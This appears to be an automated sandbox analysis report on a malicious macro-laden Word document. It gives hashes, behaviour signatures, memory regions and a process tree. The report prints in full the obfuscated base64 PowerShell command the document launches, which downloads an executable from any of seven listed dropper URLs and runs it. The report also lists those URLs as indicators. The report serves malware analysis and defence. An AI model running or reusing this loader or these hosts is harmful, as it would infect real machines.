Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28/05/2024, 18:11

General

  • Target

    7de5db6870aab3425bcf4f0b03977d4e_JaffaCakes118.doc

  • Size

    155KB

  • MD5

    7de5db6870aab3425bcf4f0b03977d4e

  • SHA1

    74afe807f26bc2d2676f6924fc671055a6cbd52e

  • SHA256

    c0d8ad4aed593521165bea2e923bbe309fac7277745027f3a54b57d4ac76161a

  • SHA512

    c5193f951b776b48d634d76c5288ef72450188926210df8eed3b085fc9e61b4ca1cf0035bf0a0a619c0a66e16c230a4ed6811964b1ccf314c9a76d4cd3492587

  • SSDEEP

    1536:CINj/tINj/ardi1Ir77zOH98Wj2gpngB+a9/pNvuaRlYYP46/3k/W+U9iSvgR0wW:VrfrzOH98ipgrNQYP4zIa0wW

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://asfckmusic.com/axhhy/2/

exe.dropper

http://webtalavera.com/site/1nBdLgY/

exe.dropper

http://varthana.com/archive/sEaku/

exe.dropper

http://rjsoft.nl/helpdesk/8TQ54h/

exe.dropper

http://zoomandshootphotography.com/wp-includes/MPkwrU2/

exe.dropper

http://prodel.com.br/pedidos/Sp9/

exe.dropper

http://iemsys.co.za/fsffa.co.za/2ntFq/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7de5db6870aab3425bcf4f0b03977d4e_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABXADcAYgBqAGcAcgBrAD0AKAAoACcASgBpACcAKwAnAHQAdAAnACkAKwAnAHQAJwArACcAbQAzACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgBWADoAdQBTAGUAcgBwAFIATwBmAGkAbABFAFwAZgBRAFIAZQBZAGYAdQBcAGcAdwBVAHEAVABmADUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIAZQBjAHQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAHUAUgBpAFQAYABZAFAAYABSAGAATwB0AGAAbwBjAE8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbAAnACsAJwBzADEAMgAsACcAKQArACcAIAAnACsAJwB0AGwAJwArACgAJwBzADEAJwArACcAMQAsACAAdABsAHMAJwApACkAOwAkAEsAMABvADkAbAB0AGgAIAA9ACAAKAAoACcAWgAnACsAJwB0AGYAcwAnACkAKwAnAHEAdwAnACsAJwBhACcAKwAnADkAcAAnACkAOwAkAEUAZABoADQAYQBpAGYAPQAoACcAQwAnACsAKAAnAHAAcgAnACsAJwAwAHUAMgAnACkAKwAnAGYAJwApADsAJABCADAAcQBwADEAMwBqAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAB9AEYAcQByAGUAeQBmAHUAJwArACcAewAwACcAKwAnAH0ARwAnACsAJwB3ACcAKwAnAHUAcQB0AGYANQB7ADAAfQAnACkALQBGACAAIABbAGMAaABhAFIAXQA5ADIAKQArACQASwAwAG8AOQBsAHQAaAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFQAcAB3AGEAegA4ADYAPQAoACgAJwBNAF8AYQBsACcAKwAnAG4AJwApACsAJwBqACcAKwAnADcAJwApADsAJABUAHUAdQBlAGgAeAA4AD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAHcARQBiAEMAbABJAGUATgB0ADsAJABVAHcANAA5AHIAOABqAD0AKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKwAnADoAJwArACgAJwAvAC8AYQAnACsAJwBzACcAKQArACgAJwBmAGMAawBtAHUAcwAnACsAJwBpACcAKwAnAGMAJwArACcALgAnACsAJwBjAG8AbQAvAGEAJwApACsAKAAnAHgAaABoAHkALwAyAC8AKgAnACsAJwBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6AC8ALwB3AGUAYgB0AGEAbABhACcAKwAnAHYAJwArACcAZQByAGEALgBjAG8AJwArACcAbQAvAHMAaQB0AGUAJwArACcALwAnACkAKwAoACcAMQBuACcAKwAnAEIAJwArACcAZABMAGcAWQAvACoAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwAnACkAKwAoACcAdgBhACcAKwAnAHIAJwApACsAJwB0ACcAKwAoACcAaABhAG4AYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGEAJwApACsAKAAnAHIAJwArACcAYwBoAGkAdgAnACkAKwAoACcAZQAvACcAKwAnAHMARQBhAGsAJwArACcAdQAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAnAHQAJwArACgAJwB0AHAAOgAvAC8AcgBqAHMAJwArACcAbwAnACsAJwBmAHQALgAnACkAKwAoACcAbgBsAC8AJwArACcAaABlAGwAJwArACcAcABkAGUAcwBrACcAKQArACgAJwAvACcAKwAnADgAVAAnACkAKwAoACcAUQA1ACcAKwAnADQAaAAnACsAJwAvACoAJwApACsAJwBoAHQAJwArACcAdABwACcAKwAoACcAOgAvAC8AJwArACcAegBvACcAKQArACgAJwBvAG0AYQBuACcAKwAnAGQAcwBoAG8AbwAnACsAJwB0ACcAKQArACcAcAAnACsAKAAnAGgAbwB0AG8AJwArACcAZwAnACsAJwByAGEAcABoAHkALgAnACsAJwBjAG8AbQAvAHcAcAAtAGkAbgAnACkAKwAoACcAYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQAnACsAJwBzAC8AJwArACcATQBQAGsAdwAnACkAKwAoACcAcgBVACcAKwAnADIAJwApACsAKAAnAC8AKgBoAHQAdAAnACsAJwBwACcAKQArACgAJwA6AC8AJwArACcALwBwAHIAJwApACsAJwBvAGQAJwArACcAZQBsACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0ALgAnACsAJwBiACcAKQArACgAJwByAC8AJwArACcAcABlAGQAaQAnACkAKwAoACcAZABvAHMALwBTAHAAOQAvACoAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAJwApACsAJwBwADoAJwArACcALwAvACcAKwAoACcAaQAnACsAJwBlAG0AJwArACcAcwB5AHMALgBjAG8AJwApACsAKAAnAC4AegBhACcAKwAnAC8AZgBzAGYAZgAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwAuACcAKQArACgAJwB6AGEALwAnACsAJwAyACcAKQArACcAbgAnACsAKAAnAHQAJwArACcARgBxAC8AJwApACkALgAiAHMAUABMAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgA5AGsAZwA2AHUAaAA9ACgAJwBKACcAKwAnADAAJwArACgAJwBqAG0AJwArACcAbQBhAF8AJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABJAGcAagBuADkAOAAxACAAaQBuACAAJABVAHcANAA5AHIAOABqACkAewB0AHIAeQB7ACQAVAB1AHUAZQBoAHgAOAAuACIARABgAE8AdwBuAEwAbwBgAEEARABGAGAASQBsAGUAIgAoACQASQBnAGoAbgA5ADgAMQAsACAAJABCADAAcQBwADEAMwBqACkAOwAkAEkAYgA1AHYAbABvAHQAPQAoACcARwAnACsAKAAnAHEAbQAnACsAJwBiACcAKQArACgAJwBpACcAKwAnADUAaAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABCADAAcQBwADEAMwBqACkALgAiAGwAYABFAE4ARwBgAFQASAAiACAALQBnAGUAIAAzADYAMwAzADgAKQAgAHsALgAoACcASQBuACcAKwAnAHYAbwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAoACQAQgAwAHEAcAAxADMAagApADsAJABJAGUAdwBxADAAdgBpAD0AKAAnAEkAeAAnACsAKAAnADIAeQB0ACcAKwAnAHAAcQAnACkAKQA7AGIAcgBlAGEAawA7ACQAUAAwAG0AcABsADUAcAA9ACgAKAAnAEEAMAAnACsAJwBvAGkAZwBkACcAKQArACcAdQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAMwBfADgAbwAwAG4APQAoACcAUAAnACsAKAAnAG8AYQAyADMAJwArACcAeAAxACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2552

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      a5c0a87998bc101ef9863abe6c0d72f7

      SHA1

      f2d8e5309e589623d3575f301877951e339f7e1c

      SHA256

      33bd742af279eeb5162d2d311ca309413a9ccec49a1271f384812943c1e83b49

      SHA512

      6e852bedc7ad0366561721a0bc32dbf54d3da413749fa4a3c7cc47a75f4dfbf9ab8f1698e7c69d698d298582ebc68ce86d81274c2d05419486b9c6bf440344c3

    • memory/2176-33-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-45-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

      Filesize

      44KB

    • memory/2176-7-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-21-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-22-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-32-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-31-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-0-0x000000002F901000-0x000000002F902000-memory.dmp

      Filesize

      4KB

    • memory/2176-2-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

      Filesize

      44KB

    • memory/2176-70-0x0000000070FCD000-0x0000000070FD8000-memory.dmp

      Filesize

      44KB

    • memory/2176-69-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2176-46-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-48-0x0000000005B40000-0x0000000005C40000-memory.dmp

      Filesize

      1024KB

    • memory/2176-49-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-50-0x0000000004E90000-0x0000000004F90000-memory.dmp

      Filesize

      1024KB

    • memory/2176-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2552-40-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/2552-39-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

      Filesize

      2.9MB